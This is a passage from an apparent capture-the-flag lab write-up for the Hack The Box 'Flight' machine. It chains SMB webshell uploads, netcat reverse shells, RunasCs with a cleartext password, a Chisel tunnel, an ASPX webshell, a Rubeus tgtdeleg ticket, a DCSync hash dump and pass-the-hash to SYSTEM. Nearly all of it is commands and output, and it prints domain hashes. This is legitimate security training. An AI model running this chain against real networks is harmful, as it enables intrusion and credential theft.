  ie6.css                             A      587  Fri Dec  2 20:42:00 2011
  style.css                           A    11045  Wed Jan 25 21:17:32 2012

        5056511 blocks of size 4096. 1248132 blocks available
smb: \school.flight.htb\styles\> put shell.php
putting file shell.php as \school.flight.htb\styles\shell.php (1.2 kb/s) (average 1.2 kb/s)
smb: \school.flight.htb\styles\> ls
  .                                   D        0  Fri Mar 14 23:42:47 2025
  ..                                  D        0  Fri Mar 14 23:42:47 2025
  ie6.css                             A      587  Fri Dec  2 20:42:00 2011
  shell.php                           A       36  Fri Mar 14 23:42:47 2025
  style.css                           A    11045  Wed Jan 25 21:17:32 2012

        5056511 blocks of size 4096. 1248132 blocks available
smb: \school.flight.htb\styles\> 

I’m using styles just to be a bit more hidden. The webshell works:

┌──(puck㉿kali)-[~/htb/flight]
└─$ curl school.flight.htb/styles/shell.php?cmd=whoami
flight\svc_apache

Shell

To go from webshell to shell, I’ll upload nc64.exe to the same folder:

smb: \school.flight.htb\styles\> put nc64.exe nc64.exe
putting file nc64.exe as \school.flight.htb\styles\nc64.exe (99.6 kb/s) (average 99.6 kb/s)

Now I’ll invoke it over the webshell:

puck@kali$ curl -G school.flight.htb/styles/shell.php --data-urlencode 'cmd=nc64.exe -e cmd.exe 10.10.14.4 443'

It hangs, but at a nc listening, there’s a shell:

┌──(puck㉿kali)-[~/htb/flight]
└─$ rlwrap nc -nlvp 443                      
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.187] 50027
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\school.flight.htb\styles>whoami
whoami
flight\svc_apache

C:\xampp\htdocs\school.flight.htb\styles>

Shell as C.Bum

Enumeration

File System

As svc_apache, there’s not much I didn’t already have access to over SMB. The web directories sit at C:\xampp\htdocs, which is common for an XAMPP deployment on Windows.

There is an inetpub directory at the root of C:\. That’s the directory IIS typically runs from:

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 163B-E248

 Directory of C:\

10/25/2022  06:22 PM    <DIR>          inetpub
06/07/2022  06:39 AM    <DIR>          PerfLogs
10/21/2022  11:49 AM    <DIR>          Program Files
07/20/2021  12:23 PM    <DIR>          Program Files (x86)
10/25/2022  05:49 PM    <DIR>          Shared
09/22/2022  12:28 PM    <DIR>          StorageReports
09/22/2022  01:16 PM    <DIR>          Users
10/21/2022  11:52 AM    <DIR>          Windows
09/22/2022  01:16 PM    <DIR>          xampp
               0 File(s)              0 bytes
               9 Dir(s)  15,360,438,272 bytes free

The wwwroot directory (the default server, kind of like html in /var/www with Apache on Linux) has the default stuff in it:

C:\inetpub\wwwroot>dir    
dir
 Volume in drive C has no label.
 Volume Serial Number is 163B-E248

 Directory of C:\inetpub\wwwroot    

09/22/2022  12:28 PM    <DIR>          .
09/22/2022  12:28 PM    <DIR>          ..
09/22/2022  12:28 PM    <DIR>          aspnet_client
09/22/2022  12:24 PM               703 iisstart.htm
09/22/2022  12:24 PM            99,710 iisstart.png
               2 File(s)        100,413 bytes
               3 Dir(s)  15,360,327,680 bytes free

But there is a development directory that looks to have a real website in it:

C:\inetpub\development>dir
 Volume in drive C has no label.
 Volume Serial Number is 163B-E248

 Directory of C:\inetpub\development

10/25/2022  06:22 PM    <DIR>          .
10/25/2022  06:22 PM    <DIR>          ..
04/16/2018  02:23 PM             9,371 contact.html
10/25/2022  06:22 PM    <DIR>          css
10/25/2022  06:22 PM    <DIR>          fonts
10/25/2022  06:22 PM    <DIR>          img
04/16/2018  02:23 PM            45,949 index.html
10/25/2022  06:22 PM    <DIR>          js
               2 File(s)         55,320 bytes
               6 Dir(s)  15,360,327,680 bytes free

The development directory can be written to by C.Bum:

C:\inetpub>icacls development
development flight\C.Bum:(OI)(CI)(W)
            NT SERVICE\TrustedInstaller:(I)(F)
            NT SERVICE\TrustedInstaller:(I)(OI)(CI)(IO)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
            BUILTIN\Administrators:(I)(F)
            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
            BUILTIN\Users:(I)(RX)
            BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
            CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

Network

Looking at the listening ports, there are a lot as is standard on any DC:

C:\xampp\htdocs\school.flight.htb\styles>netstat -ano | findstr LISTENING
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       5328          
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       676            
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       968
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       676
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       5328
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       676
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       968 
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       676
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       676
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       676
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8000           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2876
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
...[snip]...

I’m particularly interested in the ones that I can’t reach from my VM, like 8000 (maybe the development site?).

C.Bum

C.Bum is a member of the WebDevs group, but not the Remote Users group:

C:\>net user C.Bum
User name                    C.Bum
Full Name                    
Comment                      Senior Web Developer
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            9/22/2022 1:08:22 PM
Password expires             Never
Password changeable          9/23/2022 1:08:22 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   9/22/2022 2:50:24 PM

Logon hours allowed          All

Local Group Memberships      
Global Group memberships     *Domain Users         *WebDevs              
The command completed successfully.

This means I can’t use WinRM to execute commands as C.Bum in PowerShell.

RunasCs

The RunasCs project aims to create a binary like runas.exe but without limitations:

• Allows explicit credentials
• Works both if spawned from interactive process and from service process
• Manage properly DACL for Window Stations and Desktop for the creation of the new process
• Uses more reliable create process functions like CreateProcessAsUser() and CreateProcessWithTokenW() if the calling process holds the required privileges (automatic detection)
• Allows to specify the logon type, e.g. 8-NetworkCleartext logon (no UAC limitations)
• Allows to bypass UAC when an administrator password is known (flag –bypass-uac)
• Allows redirecting stdin, stdout and stderr to a remote host
• It’s Open Source 🙂

It’s from one of the authors of the Potato exploits, and a really nice tool to have.

I’ll download the latest release, host it with a Python web server, and upload it to Flight:

C:\ProgramData>powershell -c wget 10.10.14.3:8000/RunasCs.exe -outfile r.exe

Now I’ll invoke a cmd.exe as C.Bun using -r to redirect STDIN/STDOUT to my host:

C:\ProgramData>.\r.exe C.Bum Tikkycoll_431012284 -r 10.10.14.3:443 cmd
[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-5ea78$\Default
[+] Async process 'cmd' with pid 4508 created and left in background.

C:\ProgramData>

With nc listening on my box, there’s a connection:

┌──(puck㉿kali)-[~/htb/flight]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.187] 50043
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
flight\c.bum

C:\Windows\system32>

I can now get user.txt:

C:\Users\C.Bum\Desktop>type user.txt
45d7ff00d8e8********************

Shell as defaultapppoll

Enumeration

Tunnel

I’ll take a look at the development website. To do this, I’ll upload Chisel:

C:\ProgramData>powershell -c wget 10.10.14.3:8000/chisel.exe -outfile c.exe

Now I’ll start the server on my VM:

┌──(puck㉿kali)-[~/htb/flight]
└─$ chisel server -p 8000 --reverse
2025/03/21 02:56:18 server: Reverse tunnelling enabled
2025/03/21 02:56:18 server: Fingerprint 30mcEyeiYU0qX9+F3KqwQ2z0ArRnPkDC3B+7iKM5i5s=
2025/03/21 02:56:18 server: Listening on http://0.0.0.0:8000

I use -p 8000 to listen on 8000 (the default port of 8080 is already in use by Burp), and give it --reverse to allow incoming connections to open listeners on my host that tunnel back through them.

I’ll connect from Flight, tunneling port 8001 on my host through the tunnel to 8000 on Flight:

c:\ProgramData>.\c client 10.10.14.3:8000 R:8001:127.0.0.1:8000
.\c client 10.10.14.3:8000 R:8001:127.0.0.1:8000
2025/03/20 18:57:10 client: Connecting to ws://10.10.14.3:8000
2025/03/20 18:57:10 client: Connected (Latency 10.1468ms)

Site

Visiting http://127.0.0.1:8001 in Firefox returns another site:

Nothing useful on the page. There’s a /contact.html that doesn’t have any useful information either.

Tech Stack

The response headers show that the site is hosted by IIS (rather than Apache):

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 16 Apr 2018 21:23:22 GMT
Accept-Ranges: bytes
ETag: "019c25c9d5d31:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Wed, 26 Oct 2022 01:47:57 GMT
Connection: close
Content-Length: 9371

They also show X-Powered-By: ASP.NET. Typically that means that .aspx type pages are in use.

WebShell

Write File

I’ll remember that C.Bum should have write access to this directory. I’ll test that out with a dummy file:

C:\inetpub\development>echo "test" > puck.txt

The text loads:

ASPX Echo

To see if ASPX code will run, I’ll create a silly ASPX file that writes a string, poc.aspx:

<% Response.Write("puck was here") %>

I’ll upload that over SMB, and then copy it into the development directory:

C:\inetpub\development>copy \xampp\htdocs\poc.aspx .
        1 file(s) copied.

On visiting the page, it works:

. 

Webshell

To run commands, I’ll download this aspx webshell from GitHub, upload it over SMB, and copy it into place:

c:\inetpub\development\development>powershell -c wget 10.10.14.3/cmd.aspx -outfile cmd.aspx
                                   powershell -c wget 10.10.14.3/cmd.aspx -outfile cmd.aspx
powershell -c wget 10.10.14.3/cmd.aspx -outfile cmd.aspx

c:\inetpub\development\development>

Loading the page shows a form:

Clicking “Run” shows the output below:

. 

Shell

My copy of nc64.exe has long been wiped by resets, but I’ll upload it back to \programdata,

c:\inetpub\development\development>powershell -c wget 10.10.14.3/nc64.exe -outfile c:\programdata\nc64.exe

and then execute it via the cmd.aspx webshell:

/c c:\programdata\nc64.exe 10.10.14.3 443 -e cmd

At my nc listener, I get a shell as defaultapppool:

┌──(puck㉿kali)-[~/htb]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.187] 51778
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv>

Shell as administrator

Strategy

iis apppool\defaultapppool is a Microsoft Virtual Account. One thing about these accounts is that when they authenticate over the network, they do so as the machine account. For example, if I start responder and then try to open an SMB share on it (net use \\10.10.14.6\doesntmatter), the account I see trying to authenticate is flight\G0$:

[SMB] NTLMv2-SSP Client   : ::ffff:10.10.11.187
[SMB] NTLMv2-SSP Username : flight\G0$
[SMB] NTLMv2-SSP Hash     : G0$::flight:1e589bf41238cf8e:547002306786919B6BB28F45BC6EEA4F:010100000000000080ADD9B1DBEAD801A1870276D7F4D729000000000200080052004F003500320001001E00570049004E002D00450046004B004A004B0059004500500037003900500004003400570049004E002D00450046004B004A004B005900450050003700390050002E0052004F00350032002E004C004F00430041004C000300140052004F00350032002E004C004F00430041004C000500140052004F00350032002E004C004F00430041004C000700080080ADD9B1DBEAD80106000400020000000800300030000000000000000000000000300000B1315E28BC96528147F3929B329DC4FE9D27ADEB96DF3BCF9F6C892CCB4443D80A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0036000000000000000000

I won’t be able to crack that NetNTLMv2 because the machine accounts use long random passwords. But it does show that the defaultapppool account is authenticating as the machine account.

To abuse this, I’ll just ask the machine for a ticket for the machine account over the network. I showed this same attack as an unintended method in PivotAPI.

Get Ticket

Upload Rubeus

Rather than compile it myself, I’ll grab the latest compiled version of the binary from SharpCollection. I’ll host it with Python HTTP, and upload it to Flight:

c:\ProgramData>powershell wget 10.10.14.3:8000/Rubeus.exe -outfile rubeus.exe

Generate Ticket

To create a ticket, I’ll use the tgtdeleg command:

c:\ProgramData>.\rubeus.exe tgtdeleg /nowrap

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv>cd c:\programdata
cd c:\programdata

c:\ProgramData>.\rubeus.exe tgtdeleg /nowrap
.\rubeus.exe tgtdeleg /nowrap

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2 


[*] Action: Request Fake Delegation TGT (current user)

[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/g0.flight.htb'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: 0bDamHJs2SjKKtAP1mRuzqikYdtu2QKPe186mdGmuZY=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):

      doIFVDCCBVCgAwIBBaEDAgEWooIEZDCCBGBhggRcMIIEWKADAgEFoQwbCkZMSUdIVC5IVEKiHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkZMSUdIVC5IVEKjggQgMIIEHKADAgESoQMCAQKiggQOBIIECmUGjzcbRS251O4bGQhhVU+GHvop38Uz8nMuzz17wzLwPwzsuTQVpAWadIo1vwjhsQwf5rbfodxKvfqAhtheuHJipS9xRvn7s7kXPNaRespxog61LVEOKBgh4KtS+oFh78+2G2X5MUFmHlKSCUaT1m+aRN64UiS49s+n+IhQhfOeCnhWSnt9b6pLo+IJ8tLhiGenlaMjqqWEtNbfNLOCviULWWj3KTN9ZQueXKioJs+paDemtT1XXq22kHt4A+vGKMcThrisuBBNbSyfV/MKH4Ln+ivenXOJNTbTJQU2Z5tGg8rIsyzVun1trPv1XGfjrIcMGdchR8CeNN4b1jJRXYaefxsU1jtSy5utvzFtuwEtlBSjZm1tD8ZAyAZbuJ1zqVz/Bc/W7LXSb1enRP6uATPqnwALsk/ZerKcsmYDBFHjBrNzdsUcaJV6dgQIMomwHQZ08pl5UmGE99H8qAi5Gsx7QMmieij4OQbN73UBsfP1tXyJXB3077c5Nl/HpKwZ17mn3BIFaptxKVukErC0qlm71183K/3ALJJ6UIO3aPLBjiukdkElMqAjjFwnrhDoaNr1APgAPtms1+i7ya/7b/zR6/jlLTbXwcZlK3dlgRhJJN/70HGPmNCYqzLnFe6pwrw48KstgUe+F30KeWuWyMApH/zko/AcwMOyJ6v9sn55knL+ixyAjL/PyssJBMPcITScGiw9FpIo0S4sQ5SJROBovYJpxADquHotNLhAum4dXpWXisg3inXFIV5QfD4xaD79wW+0yYi+PEKAyudLwd27XnlNAbcQfT2fX6L2yKPaB/eIYREoqFe35xXhJ685MvSmNt9b7VJmeDCzGEnVhfLrN/IB+4JL3H2/h6VlsY4PSaKBHoXCopxZSfTdX+wAD9COR2J8SyTzTe9VWkgfED2hED20Rdei5un7Sksx4QNyYxvVaEJCcDVJAZ/sfptgxRQ0A3VbdhJh6nKh5+Z/axxyzRgfkQem4Bqtjpgdc06WVLqUmOYZBVwyrsV1OUI33OCByuZcSZnpnrYsDjrCIA/HEOLJPFJyp8tcacL9xJYpPZ6RESHzWf7Lz7pGWIue2DMoXITzOnTxtBiJAm1Hya3Juqk0vC1yg9mqRC6ZNOwt0DfEGqfRBRcR5ryH/Wr6uoPVpAg3MKD2VYJoYuMua+FmdPFT9D4ItxVRY6bDS1RQN0mnhvLyhQjaSGoRvPvOGFAyv38aeMccegZaYseb5x52hX8GQxg82LCUjznZXubreDyeC3KrfxXpEb/46NevNyQmWFPP1Unas+isAkponCAXmJsSPon/nd719ZnEy6rYqwzDsnibOwlBHmxriS+Kp6UaDaqw7+lQBfjReQihtJFz0aTzquiczIQKo4HbMIHYoAMCAQCigdAEgc19gcowgceggcQwgcEwgb6gKzApoAMCARKhIgQgipnYnT3hLPnvxaegn6bto0XfXYgm0dnq3suao30wH8ChDBsKRkxJR0hULkhUQqIQMA6gAwIBAaEHMAUbA0cwJKMHAwUAYKEAAKURGA8yMDI1MDMyMTAyMzEwN1qmERgPMjAyNTAzMjExMjMxMDdapxEYDzIwMjUwMzI4MDIzMTA3WqgMGwpGTElHSFQuSFRCqR8wHaADAgECoRYwFBsGa3JidGd0GwpGTElHSFQuSFRC

c:\ProgramData>

Configure Kerberos Ticket

With a ticket for the machine account, I can do a DCSync attack, effectively telling the DC that I’d like to replicate all the information in it to myself. To do that, I’ll need to configure Kerberos on my VM to use the ticket I just dumped.

I’ll decode the base64 ticket and save it as ticket.kirbi. Then kirbi2ccache will convert it to the format needed by my Linux system:

┌──(puck㉿kali)-[~/htb/flight]
└─$ python3 kirbi2ccache.py    
usage: kirbi2ccache.py [-h] [-v] kirbi ccache
kirbi2ccache.py: error: the following arguments are required: kirbi, ccache
                                                                                                                      
┌──(puck㉿kali)-[~/htb/flight]
└─$ python3 kirbi2ccache.py ticket.kirbi ticket.ccache
INFO:root:Parsing kirbi file /home/puck/htb/flight/ticket.kirbi
INFO:root:Done!

Now I’ll export the environment variable to hold that ticket:

puck@kali$ export KRB5CCNAME=ticket.ccache 

Time Issues

It’s really common when doing these kinds of attacks to run into time issues. When I run secretsdump.py from Impacket to dump all the hashes from the DC, it fails:

puck@kali$ secretsdump.py -k -no-pass g0.flight.htb 
Impacket v0.10.1.dev1+20220720.103933.3c6713e - Copyright 2022 SecureAuth Corporation

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up... 

It suggests adding -just-dc-user:

-just-dc-user USERNAME Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch

I’ll go for administrator, but it still fails:

puck@kali$ secretsdump.py -k -no-pass g0.flight.htb -just-dc-user administrator
Impacket v0.10.1.dev1+20220720.103933.3c6713e - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up... 

Here’s the real issue – KRB_AP_ERR_SKEW.

Fix Time

I’ll fix the time with ntpdate, telling it to set my time to the NTP server on Flight:

puck@kali$ sudo ntpdate -s flight.htb

This will likely drop my VPN connection, but after reconnecting, I can dump the hashes:

┌──(puck㉿kali)-[~/htb/flight]
└─$ nano ticket2.kirbi
                                                                                                                    
┌──(puck㉿kali)-[~/htb/flight]
└─$ python3 kirbi2ccache.py ticket2.kirbi ticket2.ccache
INFO:root:Parsing kirbi file /home/puck/htb/flight/ticket2.kirbi
INFO:root:Done!
                                                                                                                    
┌──(puck㉿kali)-[~/htb/flight]
└─$ impacket-secretsdump -k -no-pass g0.flight.htb -just-dc-user administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[-] RemoteOperations failed: invalid principal syntax
[*] Cleaning up... 
                                                                                                                    
┌──(puck㉿kali)-[~/htb/flight]
└─$ export KRB5CCNAME=ticket2.ccache
                                                                                                                    
┌──(puck㉿kali)-[~/htb/flight]
└─$ klist         
Ticket cache: FILE:ticket2.ccache
Default principal: G0$@FLIGHT.HTB

Valid starting       Expires              Service principal
03/21/2025 03:31:07  03/21/2025 13:31:07  krbtgt/FLIGHT.HTB@FLIGHT.HTB
                                                                                                                    
┌──(puck㉿kali)-[~/htb/flight]
└─$ impacket-secretsdump -k -no-pass g0.flight.htb -just-dc-user administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:08c3eb806e4a83cdc660a54970bf3f3043256638aea2b62c317feffb75d89322
Administrator:aes128-cts-hmac-sha1-96:735ebdcaa24aad6bf0dc154fcdcb9465
Administrator:des-cbc-md5:c7754cb5498c2a2f
[*] Cleaning up... 
                                                                                                                    
┌──(puck㉿kali)-[~/htb/flight]

.


It works now without -just-dc-user as well:

┌──(puck㉿kali)-[~/htb/flight]
└─$ impacket-secretsdump -k -no-pass g0.flight.htb                            
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6a2b6ce4d7121e112aeacbc6bd499a7f:::
S.Moon:1602:aad3b435b51404eeaad3b435b51404ee:f36b6972be65bc4eaa6983b5e9f1728f:::
R.Cold:1603:aad3b435b51404eeaad3b435b51404ee:5607f6eafc91b3506c622f70e7a77ce0:::
--snip--
G0$:aes256-cts-hmac-sha1-96:11ad9a25157bdc6e7fd9df6c0872c33d790f7660c6f5e6ea526996b808e4d7bb
G0$:aes128-cts-hmac-sha1-96:fa0d7c35e273ae2121d1e3c54b19c3cf
G0$:des-cbc-md5:463d9edadc20e308
[*] Cleaning up... 
                                                                                                                    
┌──(puck㉿kali)-[~/htb/flight]

..

Shell

Those hashes work for a pass the hash attack:

┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb flight.htb -u administrator -H aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c 
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.187    445    G0               [+] flight.htb\administrator:43bbfc530bab76141b12c8446e30c17c (Pwn3d!)

Itshows Pwn3d! because the creds are good and this is an administrator account.

psexec.py works to get a shell from here:

┌──(puck㉿kali)-[~/htb/flight]
└─$ impacket-psexec administrator@flight.htb -hashes aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on flight.htb.....
[*] Found writable share ADMIN$
[*] Uploading file FQixGuoG.exe
[*] Opening SVCManager on flight.htb.....
[*] Creating service dYER on flight.htb.....
[*] Starting service dYER.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
g0

C:\Windows\system32> 

.

That was Fun 🙂